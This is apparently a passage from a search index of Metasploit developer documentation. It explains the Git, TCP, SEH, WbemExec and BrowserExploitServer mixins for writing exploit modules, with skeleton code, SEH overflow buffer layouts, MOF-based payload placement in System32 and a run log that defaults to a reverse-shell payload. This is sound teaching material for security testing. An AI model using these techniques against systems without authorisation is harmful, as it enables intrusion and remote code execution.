&amp;gt;&amp;gt; tree_entry = { mode: '100644', file_name: 'test_file.txt', sha1: blob.sha1 } . And using that, the tree object can now be created: . &amp;gt;&amp;gt; tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry) =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe161b0cd78 . Now that the dir folder is represented in Git objects, we can represent the root of the repository. That just requires creating a blob object for file.txt, creating a tree object representing the top-level directory, and finally a commit object. Again, a blob object needs to be created to represent the contents of the remaining file: . space@vm:~/test-repo$ cat file.txt some text . &amp;gt;&amp;gt; contents = \"some text\\n\" =&amp;gt; \"some text\\n\" &amp;gt;&amp;gt; file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents) =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe163bf54b8 ... Then, a new tree object needs to be created to represent the top-level directory, which includes file.txt and the dir folder: . ?&amp;gt; entries = [ ?&amp;gt; { ?&amp;gt; mode: '100644', ?&amp;gt; file_name: 'file.txt', ?&amp;gt; sha1: file_blob.sha1 ?&amp;gt; }, ?&amp;gt; { ?&amp;gt; mode: '040000', ?&amp;gt; file_name: 'dir', ?&amp;gt; sha1: tree_object.sha1 ?&amp;gt; } &amp;gt;&amp;gt; ] =&amp;gt; [{:mode=&amp;gt;\"100644\", :file_name=&amp;gt;\"file.txt\", :sha1=&amp;gt;\"b649a9bf89116c581f8329b8ec3c79a86a70... &amp;gt;&amp;gt; top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries) . The build_commit_object() method takes a hash that expects the sha1 hash for the tree created, the sha1 hash for the parent commit if one exists, and optional data such as an author name, email address, company name, commit message, etc. If the user chooses not to pass in data for the optional data, Faker will generate random data for them. &amp;gt;&amp;gt; commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sh a1) =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe1533ac848 ... &amp;gt;&amp;gt; commit_object =&amp;gt; #&amp;lt;Msf::Exploit::Git::GitObject:0x00007fe1533ac848 @compressed= \"x\\x9C\\x95\\xCEA\\x0E\\xC2 \\x10\\x05P\\xD7\\x9Cb&amp;lt;@\\r\\x1DZ\\xCA\\xC2\\x18\\xE3\\xCE\\xA8g0XF!\\xB6\\xD0\\x00]x{I\\xED\\x05\\\\\\xCD\\xE4'\\xF3\\xFE\\xF4a\\x1C]\\x06\\x14j\\x93#\\x11pe\\b\\el5u]cL#\\xD1\\x18\\xC9\\x05\\x97\\x92\\x04*\\xF3h\\xA5P}\\xC7\\x89\\xE99\\xDB\\x10\\xE1\\xEA\\x92\\xF6&amp;amp;j\\xB8\\xCC\\x93\\xD5\\x03\\xEC\\xDF\\xCB\\xBC\\x0Fk~\\xB43\\ri\\xE7)\\x1F\\xA0\\xAEU[\\x10l\\x05T\\x85\\xE4\\xAC_\\xCA3\\xFD\\xC7\\xA8\\x0E%\\nQ\\xE3\\xAA\\xB0\\xB3w\\xD9\\x95\\xA3\\x1F\\a9@\\x98\\xC8\\xC3\\xAB\\xEC\\x91\\xA6\\x90\\\\\\x0E\\xF1\\x03\\xCF\\xF2\\xED\\xC9\\xF9T\\xDD\\x82\\x8D[\\xF6\\x05s\\xF7P\\x89\", @content= \"tree 08de2425ae774dd462dd603066e328db5638c70e\\nauthor Lisandra Kuphal &amp;lt;[email protected]&amp;gt; 1185328253 -0300\\ncommitter Lisandra Kuphal &amp;lt;[email protected]&amp;gt; 872623312 -0300\\n\\nInitial commit to open git repository for Bins-Mohr!\\n\", @path=\"01/8856fe17403b0991e5d1d3eb7f62dca4d8e951\", @sha1=\"018856fe17403b0991e5d1d3eb7f62dca4d8e951\", @type=\"commit\"&amp;gt; . That’s all that is needed to create a valid repository in Metasploit. Hosting the Repository . Metasploit’s current implementation of the Git protocol works over HTTP (SmartHttp docs), so to host a malicious repository with Metasploit, the exploit module needs to leverage the Msf::Exploit::Remote::HttpServer mixin. Additionally, the Git and Git SmartHttp mixins need to be included to build objects and create appropriate responses for the client’s requests. The module should look similar to other exploit modules that use the HttpServer mixin, defining an on_request_uri() method, a primer() method, and an exploit() method. The primer() method is first to execute, so setup for things like the repository uri can happen there: . # Creates a random uri for the Git repo, ensuring that there are no spaces def create_git_uri \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-') end # Uses GIT_URI datastore option or randomly generates a repo URI # Registers the URI with the http server and prints the entire path that client should pass to git clone def primer @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI'] @git_addr = URI.parse(get_uri).merge(@git_repo_uri) print_status(\"Git repository to clone: #{@git_addr}\") hardcoded_uripath(@git_repo_uri) end . Next, the exploit() method can be used to set up the repository. The code used in the Building a Repository section can be placed here before entering the listen / accept loop. The on_request_uri() method is where most of the module logic will live. No matter what the client sends, the request should first be parsed by Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(). The parse_raw_request() method will format the request so it is easier to work with. The first request that a client will send when cloning a repository is a reference discovery request. The client will expect things like server capabilities and the reference that HEAD points to in the response. Since this is a simple repo only one branch will exist, so HEAD will point to refs/heads/master and refs/heads/master will point to the latest commit in the repo, which in this case is the only commit in the repo. This can be represented as the following hash: . refs = { 'HEAD' =&amp;gt; 'refs/heads/master', 'refs/heads/master' =&amp;gt; commit_object.sha1 } . Creating a proper response to a ref-discovery request is done through Msf::Exploit::Git::SmartHttp.get_ref_discovery_response(). It takes two parameters: The request object from parse_raw_request() and the above refs hash. After the response is built, it can be sent back to the client.: . response = get_ref_discovery_response(request, @refs) cli.send_response(response) . If the client successfully receives the ref-discovery response, it will then send an upload-pack request. The upload-pack request is a POST request containing the client’s capabilities and a ‘want’ list for objects in the repository. To create a proper response, the Msf::Exploit::Git::SmartHttp.get_upload_pack_response() method should be used. Again, this method accepts two arguments. The first is the parsed request from the client, and the second is an array of all objects that exist in the repo. The get_upload_pack_response() method will check the sha1 hash of each object against the hashes in the want list that the client sent and send only the requested object hashes. response = get_upload_pack_response(request, @git_objs) cli.send_response(response) . Upon receiving the upload-pack response from the server, the client will build out the repository. Putting it all together, the module should look something like the following: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Git include Msf::Exploit::Git::SmartHttp include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Git Clone Test', 'Description' =&amp;gt; %q{ }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ ], 'References' =&amp;gt; [ ], 'DisclosureDate' =&amp;gt; '2022-09-22', 'Platform' =&amp;gt; [ 'unix' ], 'Arch' =&amp;gt; ARCH_CMD, 'Targets' =&amp;gt; [ [ 'Automatic Target', {}] ], 'DefaultTarget' =&amp;gt; 0, 'Notes' =&amp;gt; {} ) ) register_options( [ OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ]) ] ) deregister_options('RHOSTS', 'RPORT') end def exploit setup_repo_structure super end def setup_repo_structure # create blob object for contents of 'test_file.txt' contents = \"test\\n\" blob = Msf::Exploit::Git::GitObject.build_blob_object(contents) # create tree object representing 'test_file.txt' in 'dir' folder tree_entry = { mode: '100644', file_name: 'test_file.txt', sha1: blob.sha1 } tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry) # create blob object for contents of 'file.txt' contents = \"some text\\n\" file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents) # create tree object representing top-level directory of repo entries = [ { mode: '100644', file_name: 'file.txt', sha1: file_blob.sha1 }, { mode: '040000', file_name: 'dir', sha1: tree_object.sha1 } ] top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries) # create commit commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sha1) # create list of objects in repository, as the # client will request them to build the repository @git_objs = [ commit_object, top_level_obj, tree_object, file_blob, tree_object, blob ] @refs = { 'HEAD' =&amp;gt; 'refs/heads/master', 'refs/heads/master' =&amp;gt; commit_object.sha1 } end def create_git_uri \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-') end def primer @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI'] @git_addr = URI.parse(get_uri).merge(@git_repo_uri) print_status(\"Git repository to clone: #{@git_addr}\") hardcoded_uripath(@git_repo_uri) end def on_request_uri(cli, req) request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req) case request.type when 'ref-discovery' response = get_ref_discovery_response(request, @refs) fail_with(Failure::UnexpectedReply, 'Git client did not send a valid ref-discovery request') unless response when 'upload-pack' response = get_upload_pack_response(request, @git_objs) fail_with(Failure::UnexpectedReply, 'Git client did not send a valid upload-pack request') unless response else fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request') end cli.send_response(response) end end . Running the module . The module will start the http server and print the repo to clone . msf6 &amp;gt; use exploit/multi/http/git_clone_test [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp msf6 exploit(multi/http/git_clone_test) &amp;gt; set srvport 9999 srvport =&amp;gt; 9999 msf6 exploit(multi/http/git_clone_test) &amp;gt; set lhost 192.168.140.1 lhost =&amp;gt; 192.168.140.1 msf6 exploit(multi/http/git_clone_test) &amp;gt; set srvhost 192.168.140.1 srvhost =&amp;gt; 192.168.140.1 msf6 exploit(multi/http/git_clone_test) &amp;gt; run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf6 exploit(multi/http/git_clone_test) &amp;gt; [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Using URL: http://192.168.140.1:9999/MOYuJfC [*] Server started. [*] Git repository to clone: http://192.168.140.1:9999/y-find.git . Once the repository is cloned, you should expect to see the same contents as the test-repo at the beginning of this document: . space@ubuntu:~$ git clone http://192.168.140.1:9999/y-find.git Cloning into 'y-find'... remote: Enumerating objects: 6, done. remote: Counting objects: 100% (6/6), done. remote: Compressing objects: 100% (6/6), done. remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (6/6), 401 bytes | 200.00 KiB/s, done. space@ubuntu:~$ cd y-find space@ubuntu:~/y-find$ ls -al total 20 drwxrwxr-x 4 space space 4096 Sep 22 12:05 . drwxr-x--- 22 space space 4096 Sep 22 12:05 .. drwxrwxr-x 2 space space 4096 Sep 22 12:05 dir -rw-rw-r-- 1 space space 10 Sep 22 12:05 file.txt drwxrwxr-x 8 space space 4096 Sep 22 12:05 .git space@ubuntu:~/y-find$ cat dir/test_file.txt test space@ubuntu:~/y-find$ cat file.txt some text . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-git-mixin-to-write-an-exploit-module.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-git-mixin-to-write-an-exploit-module.html"
  },"406": {
    "doc": "TCP",
    "title": "How to use the Msf::Exploit::Remote::Tcp mixin",
    "content": "In Metasploit Framework, TCP sockets are implemented as Rex::Socket::Tcp, which extends the built-in Ruby Socket base class. You should always use the Rex socket instead of the native Ruby one because if not, your sockets are not manageable by the framework itself, and of course some features will be missing such as pivoting. The Developer’s Guide in Metasploit’s documentation directory explains how this works pretty well. For module development, normally you wouldn’t be using Rex directly, so instead you’d be using the Msf::Exploit::Remote::Tcp mixin. The mixin already provides some useful features you don’t really have to worry about during development, such as TCP evasions, proxies, SSL, etc. All you have to do is make that connection, send something, receive something, and you’re done. Sounds pretty easy, right? . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#how-to-use-the-msfexploitremotetcp-mixin",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#how-to-use-the-msfexploitremotetcp-mixin"
  },"407": {
    "doc": "TCP",
    "title": "Using the mixin",
    "content": "To use the mixin, simply add the following statement within your module’s class Metasploit3 (or class Metasploit4) scope: . include Msf::Exploit::Remote::Tcp . When the mixin is included, notice there will be the following datastore options registered under your module: . | SSL - Negotiate SSL for outgoing connections. | SSLVersion - The SSL version used: SSL2, SSL3, TLS1. Default is TLS1. | SSLVerifyMode - Verification mode: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER. Default is PEER. | Proxies - Allows your module to support proxies. | ConnectTimeout - Default is 10 seconds. | TCP::max_send_size - Evasive option. Maximum TCP segment size. | TCP::send_delay - Evasive option. Delays inserted before every send. | . If you wish to learn how to change the default value of a datastore option, please read “Changing the default value for a datastore option” . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#using-the-mixin",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#using-the-mixin"
  },"408": {
    "doc": "TCP",
    "title": "Make a connection",
    "content": "To make a connection, simply do the following: . connect . When you do this, what happens is that the connect method will call Rex::Socket::Tcp.create to create the socket, and register it to framework. It automatically checks with the RHOST/RPORT datastore options (so it knows where to connect to), but you can also manually change this: . # This connects to metasploit.com connect(true, {'RHOST'=&amp;gt;'208.118.237.137', 'RPORT'=&amp;gt;80}) . The connect method will then return the Socket object, which is also accessible globally. But you see, there’s a little more to it. The connect method can also raise some Rex exceptions that you might want to catch, including: . | Rex::AddressInUse - Possible when it actually binds to the same IP/port. | ::Errno::ETIMEDOUT - When Timeout.timeout() waits to long to connect. | Rex::HostUnreachable - Pretty self-explanatory. | Rex::ConnectionTimeout - Pretty self-explanatory. | Rex::ConnectionRefused - Pretty self-explanatory. | . So to sum it up, ideally when you use the connect method, you should rescue these: . rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused . If you are curious where all these exceptions are raised, you can find them in rex/socket/comm/local.rb. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#make-a-connection",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#make-a-connection"
  },"409": {
    "doc": "TCP",
    "title": "Sending data",
    "content": "There are several ways to send data with the Tcp mixin. To make things easier and safer, we recommend just use the put method: . sock.put \"Hello, World!\" . The reason the put method is safer is because it does not allow the routine to hang forever. By default, it doesn’t wait, but if you want to make this more flexible, you can do this: . begin sock.put(\"data\", {'Timeout'=&amp;gt;5}) rescue ::Timeout::Error # You can decide what to do if the writing times out end . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#sending-data",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#sending-data"
  },"410": {
    "doc": "TCP",
    "title": "Receiving data",
    "content": "Now, let’s talk about how to receive data. Mainly there are three methods you can use: get_once, get, and timed_read. The difference is that get_once will only try to poll the stream to see if there’s any read data available one time, but the get method will keep reading until there is no more. As for timed_read, it’s basically the read method wrapped around with a Timeout. The following demonstrates how get_once is used: . begin buf = sock.get_once rescue ::EOFError end . Note that get_once may also return nil if there is no data read, or it hits a EOFError if it receives nil as data. So please make sure you’re catching nil in your module. The data reading methods can be found in lib/rex/io/stream.rb. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#receiving-data",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#receiving-data"
  },"411": {
    "doc": "TCP",
    "title": "Disconnecting",
    "content": "To disconnect the connection, simply do: . disconnect . It is VERY important you disconnect in an ensure block, obviously to make sure you always disconnect if something goes wrong. If you don’t do this, you may end up with a module that can only one request to the server (that very first one), and the rest are broken. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#disconnecting",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#disconnecting"
  },"412": {
    "doc": "TCP",
    "title": "Full example",
    "content": "The following example should demonstrate how you would typically want to use the Tcp mixin: . # Sends data to the remote machine # # @param data [String] The data to send # @return [String] The received data def send_recv_once(data) buf = '' begin connect sock.put(data) buf = sock.get_once || '' rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError =&amp;gt; e elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") ensure disconnect end buf end . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#full-example",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#full-example"
  },"413": {
    "doc": "TCP",
    "title": "TCP",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html"
  },"414": {
    "doc": "SEH Exploitation",
    "title": "SEH Exploitation",
    "content": "Exception handler overwriting was once a very popular technique to exploit stack buffer overflows, but isn’t so common anymore in newer programs because most likely they’re compiled with SafeSEH. At one point, even with SafeSEH enabled, it was still possible to abuse an exception handler by heap spraying, but of course, memory protections didn’t stop there. DEP/FASLR eventually came to the rescue, so that pretty much ended the glory days of SEH exploits. You can probably still find vulnerable applications not compiled with SafeSEH, but chances are the app is outdated, no longer maintained, or it is more of a learning experiment for the developer. Oh, and there’s probably an exploit for that already. Nonetheless, exploiting a stack buffer overflow with exception handling is still fun, so if you do come across it, here’s how it’s supposed to be written with Metasploit’s Seh mixin. Requirements . To be able to use the SEH mixin, some exploitable requirements must be met: . | The vulnerable program does not have SafeSEH in place. | No DEP (Data Execution Prevention). The mixin uses a short jump to be able to execute the payload, which means the memory must be executable. DEP, as the name implies, prevents that. | . Usage . First, make sure you include the Seh mixin under the scope of your module’s Metasploit3 class: . include Msf::Exploit::Seh . Next, you need to set up a Ret address for the SE handler. This address should be placed in your module’s metadata, specifically under Targets. In Metasploit, each target is actually an array of two elements. The first element is just the name of the target (and there is currently no strict naming style), the second element is actually a hash that contains information specific to that target, such as the target address. Here’s an example of setting up a Ret address: . 'Targets' =&amp;gt; [ [ 'Windows XP', {'Ret' =&amp;gt; 0x75022ac4 } ] # p/p/r in ws2help.dll ] . As you can see, it’s also a good habit to document what the Ret address does, and which DLL it points to. Ret is actually kind of a special key, because it can be retrieved by using target.ret in the module. In our next examples, you will see target.ret being used instead of coding the target address raw. If you need a tool to find a POP/POP/RET for the Ret address, you can use Metasploit’s msfbinscan utility, which is located under the tools directory. OK now, let’s move on to the methods. There are two methods provided by the Seh mixin: . | generate_seh_payload - Generates a fake SEH record with the payload attached right after. Here’s an example: | . buffer = '' buffer &amp;lt;&amp;lt; \"A\" * 1024 # 1024 bytes of padding buffer &amp;lt;&amp;lt; generate_seh_payload(target.ret) # SE record overwritten after 1024 bytes . The actual layout of buffer should look like this in memory: . [ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Payload ] . | generate_seh_record - Generates a fake SEH record without the payload, in case you prefer to place the payload somewhere else. Code example: | . buffer = '' buffer &amp;lt;&amp;lt; \"A\" * 1024 # 1024 bytes of padding buffer &amp;lt;&amp;lt; generate_seh_payload(target.ret) buffer &amp;lt;&amp;lt; \"B\" * 1024 # More padding . The memory layout should like this: . [ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Padding ] . References . | https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ | https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/exploitation/seh.rb | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/seh.rb | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-seh-mixin-to-exploit-an-exception-handler.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-seh-mixin-to-exploit-an-exception-handler.html"
  },"415": {
    "doc": "WbemExec",
    "title": "WbemExec",
    "content": "Windows Management Instrumentation (WMI) is Microsoft’s implementation of Web-Based Enterprise Management (WBEM), which uses Managed Object Format (MOF) to create Common Information Model (CIM) classes. The security community was actually unfamiliar with the evilness of this technology until the birth of Stuxnet, which used a MOF file to exploit a vulnerability allowing the attacker to create files via a fake Printer Spooler service. This technique was later reverse-engineered and demonstrated in Metasploit’s ms10_061_spoolss.rb module, and that significantly changed how we approach write-privilege attacks. Generally speaking, if you find yourself being able to write to system32, you can most likely take advantage of this technique. Requirements . To to able to use the WBemExec mixin, you must meet these requirements: . | Write permission to C:\\Windows\\System32\\ | Write permission to C:\\Windows\\System32\\Wbem\\ | The target must NOT be newer than Windows Vista (so mostly good for XP, Win 2003, or older). This is more of a limitation from the API, not the technique. Newer Windows operating systems need the MOF file to be pre-compiled first. | . Usage . First, include the WbemExec mixin under the scope of your MetasploitModule class. You will also need the EXE mixin to generate an executable: . include Msf::Exploit::EXE include Msf::Exploit::WbemExec . Next, generate a payload name and the executable: . payload_name = \"evil.exe\" exe = generate_payload_exe . And then generate the mof file using the generate_mof method. The first argument should be the name of the mof file, and the second argument is the payload name: . mof_name = \"evil.mof\" mof = generate_mof(mof_name, payload_name) . Now you’re ready to write/upload your files to the target machine. Always make sure you upload the payload executable first to C:\\Windows\\System32\\. upload_file_to_system32(payload_name, exe) # Write your own upload method . And then now you can upload the mof file to C:\\Windows\\System32\\wbem\\: . upload_mof(mof_name, mof) # Write your own upload method . Once the mof file is uploaded, the Windows Management Service should pick that up and execute it, which will end up executing your payload in system32. Also, the mof file will automatically be moved out of the mof directory after use. References . | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/wbemexec.rb | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms10_061_spoolss.rb | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-wbemexec-for-a-write-privilege-attack-on-windows.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-wbemexec-for-a-write-privilege-attack-on-windows.html"
  },"416": {
    "doc": "BrowserExploitServer",
    "title": "BrowserExploitServer",
    "content": "The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are: . | Msf::Exploit::Remote::HttpServer - The most basic form of a HTTP server. | Msf::Exploit::Remote::HttpServer::HTML - which provides Javascript functions that the module can use when crafting HTML contents. | Msf::Exploit::Remote::BrowserExploitServer - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the BrowserExploitServer mixin. | . The Automatic Exploitation Procedure . The BrowserExploitServer mixin is the only mixin specially designed for browser exploitation. Before you use this mixin, you should understand what it does behind the scenes for you: . | It automatically collects the browser information, including things like: OS name, version, browser name, browser version, whether a proxy is used, Java plugin version, Microsoft Office version, etc, etc. If the browser doesn’t have Javascript enabled, then it knows less about the target. All the info gathered will be stored in a profile managed by the mixin. | The mixin will then tag the browser to track the session. It will also use the same tag to retrieve the profile when needed. | Before the mixin decides if it should serve the exploit to the browser, it will check with the module for any exploitable requirements. If the requirements aren’t met, it will send a 404 to the browser, and the operation bails. | If the requirements are met, the mixin will pass the profile (information about the browser gathered during the detection stage) to the module, and let it take over the rest. | . Hint: In the module, you can check the :source key in the profile to determine whether Javascript is enabled or not: If the :source is “script”, it means Javascript is enabled. If it’s “headers” (as in HTTP headers), then the browser has Javascript disabled. Setting Exploitable Requirements . Being able to set browser requirements is an important feature of the mixin. It allows your attack to be smarter, more targeted, and prevents accidents. Here’s a scenario: Say you have a vulnerability against Internet Explorer that only affects a specific range of MSHTML builds, you can set the :os_name, :ua_name, :ua_ver, and :mshtml_build to make sure it doesn’t blindly exploit against anything else. The :mshtml_build requirement can be found in “Product version” under MSHTML’s file properties. Exploitable browser requirements are defined under “BrowserRequirements” in the module’s metadata. Here’s an example of defining a vulnerable target running some ActiveX control: . 'BrowserRequirements' =&amp;gt; { source: /script/i, activex: [ { clsid: '{D27CDB6E-AE6D-11cf-96B8-444553540000}', method: 'LoadMovie' } ], os_name: /win/i } . You can also define target-specific requirements. This is also how the mixin is able to automatically select a target, and you can get it with the “get_target” method. Here’s an example of how to define target-specific requirements for IE8 on Win XP and IE 9 on Win 7: . 'BrowserRequirements' =&amp;gt; { :source =&amp;gt; /script|headers/i, 'ua_name' =&amp;gt; HttpClients::IE, }, 'Targets' =&amp;gt; [ [ 'Automatic', {} ], [ 'Windows XP with IE 8', { :os_name =&amp;gt; 'Windows XP', 'ua_ver' =&amp;gt; '8.0', 'Rop' =&amp;gt; true, 'Offset' =&amp;gt; 0x100 } ], [ 'Windows 7 with IE 9', { 'os_name' =&amp;gt; 'Windows 7', 'ua_ver' =&amp;gt; '9.0', 'Rop' =&amp;gt; true, 'Offset' =&amp;gt; 0x200 } ] ] . You can use these for :os_name: . | Constant | Purpose | . | OperatingSystems::Match::WINDOWS | Match all versions of Windows | . | OperatingSystems::Match::WINDOWS_95 | Match Windows 95 | . | OperatingSystems::Match::WINDOWS_98 | Match Windows 98 | . | OperatingSystems::Match::WINDOWS_ME | Match Windows ME | . | OperatingSystems::Match::WINDOWS_NT3 | Match Windows NT 3 | . | OperatingSystems::Match::WINDOWS_NT4 | Match Windows NT 4 | . | OperatingSystems::Match::WINDOWS_2000 | Match Windows 2000 | . | OperatingSystems::Match::WINDOWS_XP | Match Windows XP | . | OperatingSystems::Match::WINDOWS_2003 | Match Windows Server 2003 | . | OperatingSystems::Match::WINDOWS_VISTA | Match Windows Vista | . | OperatingSystems::Match::WINDOWS_2008 | Match Windows Server 2008 | . | OperatingSystems::Match::WINDOWS_7 | Match Windows 7 | . | OperatingSystems::Match::WINDOWS_2012 | Match Windows 2012 | . | OperatingSystems::Match::WINDOWS_8 | Match Windows 8 | . | OperatingSystems::Match::WINDOWS_81 | Match Windows 8.1 | . | OperatingSystems::Match::LINUX | Match a Linux distro | . | OperatingSystems::Match::MAC_OSX | Match Mac OSX | . | OperatingSystems::Match::FREEBSD | Match FreeBSD | . | OperatingSystems::Match::NETBSD | Match NetBSD | . | OperatingSystems::Match::OPENBSD | Match OpenBSD | . | OperatingSystems::Match::VMWARE | Match VMWare | . | OperatingSystems::Match::ANDROID | Match Android | . | OperatingSystems::Match::APPLE_IOS | Match Apple IOS | . You can use these for :ua_name: . | Constant | Value | . | HttpClients::IE | “MSIE” | . | HttpClients::FF | “Firefox” | . | HttpClients::SAFARI | “Safari” | . | HttpClients::OPERA | “Opera” | . | HttpClients::CHROME | “Chrome” | . More of these constants can be found here: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/constants.rb . All currently supported requirements by the mixin can be found here (see REQUIREMENT_KEY_SET): https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/browser_exploit_server.rb#L46 . Set up a listener . After the detection stage and the requirement check, the mixin will trigger the “on_request_exploit” callback method, that’s where you handle the HTTP request, craft the HTML, and send back the exploit response. Here’s an example of how to set up “on_request_exploit”: . # # Listens for the HTTP request # cli is the socket # request is the Rex::Proto::Http::Request object # target_info is a hash that contains all the browser info (aka the profile) # def on_request_exploit(cli, request, target_info) print_status(\"Here's what I know about the target: #{target_info.inspect}\") end . Crafting HTML with BrowserExploitServer . There are two coding styles the BrowserExploitServer mixin supports: The good old HTML, or ERB template. The first is pretty self-explanatory: . def on_request_exploit(cli, request, target_info) html = %Q| &amp;lt;html&amp;gt; Hello, world! &amp;lt;/html&amp;gt; | send_exploit_html(cli, html) end . ERB is a new way to write Metasploit browser exploits. If you’ve written one or two web applications, this is no stranger to you. When you’re using the BrowserExploitServer mixin to write an exploit, what really happens is you’re writing a rails template. Here’s an example of using of this feature: . def on_request_exploit(cli, request, target_info) html = %Q| &amp;lt;html&amp;gt; Do you feel lucky, punk?&amp;lt;br&amp;gt; &amp;lt;% if [true, false].sample %&amp;gt; Lucky!&amp;lt;br&amp;gt; &amp;lt;% else %&amp;gt; Bad luck, bro!&amp;lt;Br&amp;gt; &amp;lt;% end %&amp;gt; &amp;lt;/html&amp;gt; | send_exploit_html(cli, html) end . If you want to access local variables or arguments, make sure to pass the binding object to send_exploit_html: . def exploit_template1(target_info, txt) txt2 = \"I can use local vars!\" template = %Q| &amp;lt;% msg = \"This page is generated by an exploit\" %&amp;gt; &amp;lt;%=msg%&amp;gt;&amp;lt;br&amp;gt; &amp;lt;%=txt%&amp;gt;&amp;lt;br&amp;gt; &amp;lt;%=txt2%&amp;gt;&amp;lt;br&amp;gt; &amp;lt;p&amp;gt;&amp;lt;/p&amp;gt; Data gathered from source: #{target_info[:source]}&amp;lt;br&amp;gt; OS name: #{target_info[:os_name]}&amp;lt;br&amp;gt; UA name: #{target_info[:ua_name]}&amp;lt;br&amp;gt; UA version: #{target_info[:ua_ver]}&amp;lt;br&amp;gt; Java version: #{target_info[:java]}&amp;lt;br&amp;gt; Office version: #{target_info[:office]} | return template, binding() end def on_request_exploit(cli, request, target_info) send_exploit_html(cli, exploit_template(target_info, txt)) end . The BrowserExploitServer mixin also offers plenty of other things useful while crafting the exploit. For example: it can generate a target-specific payload when you call the “get_payload” method. It also gives you access to the RopDb mixin, which contains a collection of ROPs to bypass DEP (Data Execution Prevention). Make sure to check out the API documentation for more information. To get thing started, here’s a code example you can use start developing your browser exploit: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'BrowserExploitServer Example', 'Description' =&amp;gt; %q{ This is an example of building a browser exploit using the BrowserExploitServer mixin }, 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'sinn3r' ], 'References' 